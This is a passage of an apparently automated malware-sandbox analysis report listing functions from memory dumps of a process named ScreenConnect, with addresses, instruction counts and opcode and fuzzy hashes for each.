                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9ca31774d202d921efa52fd27d89568368ac213d6efd1773d1c7574a936dcded
                                                                                                              • Instruction ID: 8ddf351f8c9c0fa6c0421efbd9ee8a203bf6d21774664d95e644d62f0da28a38
                                                                                                              • Opcode Fuzzy Hash: 9ca31774d202d921efa52fd27d89568368ac213d6efd1773d1c7574a936dcded
                                                                                                              • Instruction Fuzzy Hash: 5AF028717002189BC728EB29EC046DEBBEAEBC8350F044679D94AD3281DF316E41CBC1
                                                                                                              Function 048DB223 Relevance: .0, Instructions: 37COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: def5e10043f968e9b4bb51455d5f4a6f6253c884f6baefc35487c5a50a54cf46
                                                                                                              • Instruction ID: e02703b3d9fae9232877184d10eb2bda29d9f6caba5b1aa366d63a9c6b35f8b8
                                                                                                              • Opcode Fuzzy Hash: def5e10043f968e9b4bb51455d5f4a6f6253c884f6baefc35487c5a50a54cf46
                                                                                                              • Instruction Fuzzy Hash: CBF0AF323053019FE314DF68D88495EBBE5EFC93A07048A2EE148CB261DB70EC45C790
                                                                                                              Function 048DB2B0 Relevance: .0, Instructions: 36COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f9054e1d27dff41d0bd6b385f9ca9167db83fb7c36846eadea04e249195991bd
                                                                                                              • Instruction ID: 9ba7470bc44cdd80bd67eb6baf3a7b1f7278ac22b7ec4aa75d25747086bc20fb
                                                                                                              • Opcode Fuzzy Hash: f9054e1d27dff41d0bd6b385f9ca9167db83fb7c36846eadea04e249195991bd
                                                                                                              • Instruction Fuzzy Hash: FD01AD75E00206CBDB09DF6AE40409E7BF2EF882157188AAED509DB301FF7499168BC0
                                                                                                              Function 048DB2C0 Relevance: .0, Instructions: 36COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e3968dba23d4876823f71f4d14f3b610f17ac495cd7f1d5ac90de4e380fc574c
                                                                                                              • Instruction ID: 9788dc421e47539566197cdb9d800fd524cbb70d06cab4e3afbb15bf33103efe
                                                                                                              • Opcode Fuzzy Hash: e3968dba23d4876823f71f4d14f3b610f17ac495cd7f1d5ac90de4e380fc574c
                                                                                                              • Instruction Fuzzy Hash: 7BF04F31F002159B9B089B6EE80549F7BE6EF843157148A6AD509DB301EF75D9168BD0
                                                                                                              Function 0074D01C Relevance: .0, Instructions: 36COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4009579757.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_74d000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9d3ea6e756d51e748401f700d75912a3a55264ecb288676f0413ddf65bfd9415
                                                                                                              • Instruction ID: 246f871b7ee3bb55c81c7423357afb26a79b962a3bd5695651ce1d18898d166f
                                                                                                              • Opcode Fuzzy Hash: 9d3ea6e756d51e748401f700d75912a3a55264ecb288676f0413ddf65bfd9415
                                                                                                              • Instruction Fuzzy Hash: E9F0CD72004344AEE7208E1ADC84B62FBA8EB81724F18C55AED881B292C3799C45CAB1
                                                                                                              Function 037014F3 Relevance: .0, Instructions: 36COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8651dfebc83fbe8dbe5aec2d3ccccacbfece3a2ba0700225042525dcf3329237
                                                                                                              • Instruction ID: 2ec4d0df4151ce79ce0920081532cd6dbaac5e62ad9ec6242eb9068cd606adc1
                                                                                                              • Opcode Fuzzy Hash: 8651dfebc83fbe8dbe5aec2d3ccccacbfece3a2ba0700225042525dcf3329237
                                                                                                              • Instruction Fuzzy Hash: C6F09036300118AFCF05DED8EC509AE3BB7EBC8360B044129F909D7351CB3248119BA0
                                                                                                              Function 048DB230 Relevance: .0, Instructions: 34COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1122a0b85a6514edc98ae08300a5dd40ba1f6e7572fdee55c5d63f27021c30a9
                                                                                                              • Instruction ID: 493ee10c229cfa7c5143885110d9b2cb11f3fe764c8f77797d3a8ebc788a4ac5
                                                                                                              • Opcode Fuzzy Hash: 1122a0b85a6514edc98ae08300a5dd40ba1f6e7572fdee55c5d63f27021c30a9
                                                                                                              • Instruction Fuzzy Hash: F6F0BE313003049BA714DAA9D884D5EB7E9EFC42A03048A29E518CB360DB71EC458790
                                                                                                              Function 037018C8 Relevance: .0, Instructions: 34COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6a626bc49ecc74fdb2aca104c634b93a8a7b7603eddb5e335a4e34426c0aa41b
                                                                                                              • Instruction ID: a3dd8c559a037d967dc7f2f2e70475c01ab391246c972a5a946dd744219fb688
                                                                                                              • Opcode Fuzzy Hash: 6a626bc49ecc74fdb2aca104c634b93a8a7b7603eddb5e335a4e34426c0aa41b
                                                                                                              • Instruction Fuzzy Hash: 90F0E235700305DBC315DA5EA89481BBBDADBD4720318853AE16DC7345DF60A8044790
                                                                                                              Function 048DFE49 Relevance: .0, Instructions: 33COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 89342ec2731bdd17db3c2a6ee6880c3c4da7afaace0cdf50e4b41e165667fead
                                                                                                              • Instruction ID: 2f74a7e829a8b1f9de4fb27d4283aa76f0902a1fabeb0e005af530f87e9b5658
                                                                                                              • Opcode Fuzzy Hash: 89342ec2731bdd17db3c2a6ee6880c3c4da7afaace0cdf50e4b41e165667fead
                                                                                                              • Instruction Fuzzy Hash: 26F05C312042409FD3108B29A8459AABFB6EAC5314315C66EE70DCB303CB32BD0B8BD0
                                                                                                              Function 03704CF0 Relevance: .0, Instructions: 33COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e12c3ee03063e4dd739799f8fb395a8ea3bcdf076c9c89a6bfbf63b9e756357a
                                                                                                              • Instruction ID: b4a32a7fcfe2425ed59ab563441db2c0409af7ad98d2557703c8b4c5ba12f3ce
                                                                                                              • Opcode Fuzzy Hash: e12c3ee03063e4dd739799f8fb395a8ea3bcdf076c9c89a6bfbf63b9e756357a
                                                                                                              • Instruction Fuzzy Hash: BCF0F4B4C00206DFEB00DB20E82976BBBF4E741301F018A59C724AB281DB741150CF82
                                                                                                              Function 048DDB00 Relevance: .0, Instructions: 32COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6a22cb5bdd5b931cd22352aaf77324c64aae3f4995ba683f045d744cc3a42e63
                                                                                                              • Instruction ID: 194d104906d34477250a2ceda201f8caa10cbb25d703a88866e7c0970f1a2a82
                                                                                                              • Opcode Fuzzy Hash: 6a22cb5bdd5b931cd22352aaf77324c64aae3f4995ba683f045d744cc3a42e63
                                                                                                              • Instruction Fuzzy Hash: EEE09B327043289FDB54DFA5A8145AE7BEAEB84770F14816AE90DD7345DF319D0147C0
                                                                                                              Function 03704D00 Relevance: .0, Instructions: 32COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d07842775dd766215e45e7727d859568946742b611d5d8cd61df599fc47aea11
                                                                                                              • Instruction ID: b982008d987c509e8ec63743511b0ee55a0412aacd812f0f110ce2233573dee2
                                                                                                              • Opcode Fuzzy Hash: d07842775dd766215e45e7727d859568946742b611d5d8cd61df599fc47aea11
                                                                                                              • Instruction Fuzzy Hash: 81F06DB8D4020BDFDB10DB69E825B6EBBF4F74431AF114A66C338A7280DB7455958F81
                                                                                                              Function 03707160 Relevance: .0, Instructions: 32COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5cc0f453e77c85da558dbd6c78721d9d02e810288df9d09bceea84c071431b64
                                                                                                              • Instruction ID: 665b303feabc06739674729b37a9bea84615a9aab6a75ebe1a9246cba2a6a9cc
                                                                                                              • Opcode Fuzzy Hash: 5cc0f453e77c85da558dbd6c78721d9d02e810288df9d09bceea84c071431b64
                                                                                                              • Instruction Fuzzy Hash: EDF03A35201640DFC325CF29D945A56BBF6AFC6711B1984AED5458B3A2CB72FC01CB51
                                                                                                              Function 03700502 Relevance: .0, Instructions: 31COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8e71107f9ef634dbbe2ac61b21ed52c788076dca48f8dc92d9a6a3be58e74e5a
                                                                                                              • Instruction ID: 26b176aaa9b0198cac96d12382a631b32428c98473efeb8eeaa8a9f2937221b5
                                                                                                              • Opcode Fuzzy Hash: 8e71107f9ef634dbbe2ac61b21ed52c788076dca48f8dc92d9a6a3be58e74e5a
                                                                                                              • Instruction Fuzzy Hash: E6F07471D00219DFCB44DFA9D951A9EBBF0FF49210B1581A6D918EB321E331AA529F81
                                                                                                              Function 048D2510 Relevance: .0, Instructions: 30COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ee28854d1ab8aed63453770452879d0a8c0ab3b725dbfd1bd143f339b4f62981
                                                                                                              • Instruction ID: 694d8c5a271875e49d50a6e571dfa9a5b2ddbab550372a1e6520034fd7fcd794
                                                                                                              • Opcode Fuzzy Hash: ee28854d1ab8aed63453770452879d0a8c0ab3b725dbfd1bd143f339b4f62981
                                                                                                              • Instruction Fuzzy Hash: D2F03A31E016189BDB14DBA8C828ADEBBF1AB8C705F104A69D402F7390DB796C05CBA1
                                                                                                              Function 0370054A Relevance: .0, Instructions: 30COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0afd373cbe770d4d182b512aebb22b6be8ec9804c26c0a752c79edf412c43374
                                                                                                              • Instruction ID: 7fe66577334599027d1923b3a00f00a79a48e59a0bbf0d7daea24ee19fe12693
                                                                                                              • Opcode Fuzzy Hash: 0afd373cbe770d4d182b512aebb22b6be8ec9804c26c0a752c79edf412c43374
                                                                                                              • Instruction Fuzzy Hash: 36F05E35700129CFCB15DF69C458AAEB7E1EF88710B0980A5ED05CB3A4EB34DD01CB80
                                                                                                              Function 03700A48 Relevance: .0, Instructions: 30COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 18bbba36cbbef7ca7358cdb04b5f29008905a3d2202f1795ce841bce7a3bba11
                                                                                                              • Instruction ID: ce10b1c429c91ef634826ac8b2540e29480f6661df6c5a30f99ae92a9b52bbb2
                                                                                                              • Opcode Fuzzy Hash: 18bbba36cbbef7ca7358cdb04b5f29008905a3d2202f1795ce841bce7a3bba11
                                                                                                              • Instruction Fuzzy Hash: BAE06575704208AF8744DA8AD844E6BBBEEDFC8270714C057F90CC7350DA31D9128764
                                                                                                              Function 048D7DD3 Relevance: .0, Instructions: 29COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 581bd017fd2390e103dc0b57d719aced7a575d334ecfe71a41cc967508388508
                                                                                                              • Instruction ID: 7eebd51f295e35ae2b2978192c662eba64c3aaef1df21cac89ef66f85aefdafd
                                                                                                              • Opcode Fuzzy Hash: 581bd017fd2390e103dc0b57d719aced7a575d334ecfe71a41cc967508388508
                                                                                                              • Instruction Fuzzy Hash: ADF01735E00219CFCB00DFA8E8546DCBBB1FF89311F1082A6E109E7220EB716A95CF41
                                                                                                              Function 048D36E0 Relevance: .0, Instructions: 29COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d1197ab811b89a2a8fbeeb633423e71cd7920180fe4ca5049e2defc03b758460
                                                                                                              • Instruction ID: 8a627436b0c0ce283aa6eafa8362fd4ea23a204b70481204257875b0de06c239
                                                                                                              • Opcode Fuzzy Hash: d1197ab811b89a2a8fbeeb633423e71cd7920180fe4ca5049e2defc03b758460
                                                                                                              • Instruction Fuzzy Hash: FBF09AB4624606CFD724CF14C528AAABBB0BF44314F054A5AD480AF2A2CB35EA44CF96
                                                                                                              Function 048DDAF0 Relevance: .0, Instructions: 29COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 104d02c252be27d5c69ea3bd721a6fd7e0e1329ae55dbd79dbccdca4fd782b3f
                                                                                                              • Instruction ID: 6f56a5274c63958033ead029c610f63b8c8675ef3f0aadd199b7fb06d317e3e0
                                                                                                              • Opcode Fuzzy Hash: 104d02c252be27d5c69ea3bd721a6fd7e0e1329ae55dbd79dbccdca4fd782b3f
                                                                                                              • Instruction Fuzzy Hash: 4FE09B32B042149FD7549A7998143FE7BE6EB80760F244679D809DB795EB318D0153C4
                                                                                                              Function 03702EB1 Relevance: .0, Instructions: 28COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9a42c3a198ac3df744bbd9da73ecc3f4431315386382e92def285e1bd8ba0901
                                                                                                              • Instruction ID: 0b0f89f55215788ee634a4eb6fd17680247cc1426aa8df02b9b16dadc5377817
                                                                                                              • Opcode Fuzzy Hash: 9a42c3a198ac3df744bbd9da73ecc3f4431315386382e92def285e1bd8ba0901
                                                                                                              • Instruction Fuzzy Hash: C1F0E531806609EFCB01DFB8D8096ADBBF4DE9520071045EAD408CB643DA311E499741
                                                                                                              Function 03700510 Relevance: .0, Instructions: 27COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ab7c76101617bad0d5c579bb7c82d9c36900a8e1c306ea5602b28699e54f15e4
                                                                                                              • Instruction ID: 0fba221bf15e012fa850b305cd998cd0e957fb8d7d92cd8e9864a34dc2f08c89
                                                                                                              • Opcode Fuzzy Hash: ab7c76101617bad0d5c579bb7c82d9c36900a8e1c306ea5602b28699e54f15e4
                                                                                                              • Instruction Fuzzy Hash: E4F0D471E00219DF8B40DFADC840A9EFBF4EF49210B20C16AD918E7210E331AA12CFC0
                                                                                                              Function 03706E61 Relevance: .0, Instructions: 27COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6ec9b598f9e4c794b19f26c82aa469f440c1865043096e6e60b071e342fa1dd6
                                                                                                              • Instruction ID: 5c9810947bcab9787c38361cf6689cf609253a1eebfe9b928d4b7a68c1751dcb
                                                                                                              • Opcode Fuzzy Hash: 6ec9b598f9e4c794b19f26c82aa469f440c1865043096e6e60b071e342fa1dd6
                                                                                                              • Instruction Fuzzy Hash: 88F0D472D002189FCB44DFA8D8015AEFBB4EE45200B2185A9D919E7251E3319A129BC1
                                                                                                              Function 048DAD7B Relevance: .0, Instructions: 25COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 41ad7c5e628693abd47b504b63d8baecc1786cd5b6a59220d4fa617f02bab7e9
                                                                                                              • Instruction ID: 4e164e295e199184650546c519ca0426d46b1ed138d69c3bac1b188ee3bba24e
                                                                                                              • Opcode Fuzzy Hash: 41ad7c5e628693abd47b504b63d8baecc1786cd5b6a59220d4fa617f02bab7e9
                                                                                                              • Instruction Fuzzy Hash: 89F01572401208FFCB02DFA0DD008997FB6EF0A200B01809AF905C7222EB329A21EB90
                                                                                                              Function 03707170 Relevance: .0, Instructions: 25COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a3ed8015e627730be3bf77d9b112b7647aff954cd15e24f661c8134736c4a6d2
                                                                                                              • Instruction ID: 70c308414270a3fcd659e13494e307b97292795511ea9c54ee26aed355a0e2ae
                                                                                                              • Opcode Fuzzy Hash: a3ed8015e627730be3bf77d9b112b7647aff954cd15e24f661c8134736c4a6d2
                                                                                                              • Instruction Fuzzy Hash: ACE01235300204DFD314DB19D544E56B7E6EFC5725B5984A9E5098B7A1CB72FC41CB90
                                                                                                              Function 03701808 Relevance: .0, Instructions: 25COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4fa8bf036dcdb9c256d677f83f0aefd850a9091dc38bc0fe02e8704206cf20d7
                                                                                                              • Instruction ID: 5e4699928a9ca7e599410a1cedb530099692133b8b9b0952a155ab5af1ddb0c0
                                                                                                              • Opcode Fuzzy Hash: 4fa8bf036dcdb9c256d677f83f0aefd850a9091dc38bc0fe02e8704206cf20d7
                                                                                                              • Instruction Fuzzy Hash: BEE026327012085BC314952EE840967B3EADBC8334B640879E20CC7312CD369C828290
                                                                                                              Function 048DFE58 Relevance: .0, Instructions: 24COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bafa4e6c5562ea1da0fc2b9f7134c01e921c97e392663b261aa2b8952bbbbdff
                                                                                                              • Instruction ID: f0c9b855be2c3e0022d189511bd63a0836db3ead9d8ea8e9720f3f37ef5da746
                                                                                                              • Opcode Fuzzy Hash: bafa4e6c5562ea1da0fc2b9f7134c01e921c97e392663b261aa2b8952bbbbdff
                                                                                                              • Instruction Fuzzy Hash: 11E080313001045B5614571AA84446BB7DAE7C9325354496DE70DDB305CB31FC0747D0
                                                                                                              Function 048D30D8 Relevance: .0, Instructions: 24COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 89f6108fe8c3305bb1d392a042843f73fec04e7ccc23392cd5025c463995bcfa
                                                                                                              • Instruction ID: 44f6f92f931f30aed2b759bd7600be2766f70d60c204b6beb1cb067b13ad933b
                                                                                                              • Opcode Fuzzy Hash: 89f6108fe8c3305bb1d392a042843f73fec04e7ccc23392cd5025c463995bcfa
                                                                                                              • Instruction Fuzzy Hash: 64E06D312043109FC314DB58D494FA277B4EF49324F0605D9F2458F3B2CA66EC02C740
                                                                                                              Function 048DAE50 Relevance: .0, Instructions: 23COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 590c6cc69c117b3090f7062ee70aa552bd61e4c60365dcf88be667245b147300
                                                                                                              • Instruction ID: d00fff22dbdc9bbf9ac691fcf17018396ef6af6bd86044f63df4345c8626774e
                                                                                                              • Opcode Fuzzy Hash: 590c6cc69c117b3090f7062ee70aa552bd61e4c60365dcf88be667245b147300
                                                                                                              • Instruction Fuzzy Hash: 76E0862065A7464FDF195E25D85043237E66F455047354D98E441C7612F614B801C3A6
                                                                                                              Function 048DDB60 Relevance: .0, Instructions: 22COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c06c7784e51f4a515ecd29b51dcc8253d1f6e1fe8846d96e9b5118cf270848bd
                                                                                                              • Instruction ID: 9f21ae3cff8bcefec1f8103a21dbf90b6415ed817c0fc8c8442311813898131b
